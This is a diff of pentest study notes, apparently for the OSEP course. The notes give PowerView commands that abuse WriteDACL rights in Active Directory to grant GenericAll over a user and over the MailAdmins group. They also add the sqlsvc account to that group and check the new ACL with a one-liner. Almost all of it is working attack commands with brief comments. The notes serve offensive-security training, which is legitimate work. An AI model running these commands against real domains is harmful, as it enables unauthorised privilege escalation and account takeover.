thamyekh/OSEP-Code-Snippets/osep_notes.md

 ```
 # WriteDACL
-# scenario: user prod\offsec has WriteDACL on user prod\TestService2
+# example 1: user prod\offsec has WriteDACL on user prod\TestService2
-# example of WriteDACL abuse to give GenericAll to user testservice2
 Add-DomainObjectAcl -TargetIdentity testservice2 -PrincipalIdentity offsec -Rights All
-# note offsec will have generic all access to testservice2
+# note offsec will have generic all access to testservice2; you will need to abuse the GenericAll privileges

+# example 2: user sqlsvc has WriteDACL over the MailAdmins Group
+Add-DomainObjectAcl -TargetIdentity MailAdmins -PrincipalIdentity sqlsvc -Rights All
+# note sqlsvc will have generic all access to MailAdmins group; you will need to abuse the GenericAll privileges
+net group MailAdmins sqlsvc /add /domain

 # verify updated permission
 Get-ObjectAcl -Identity testservice2 -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}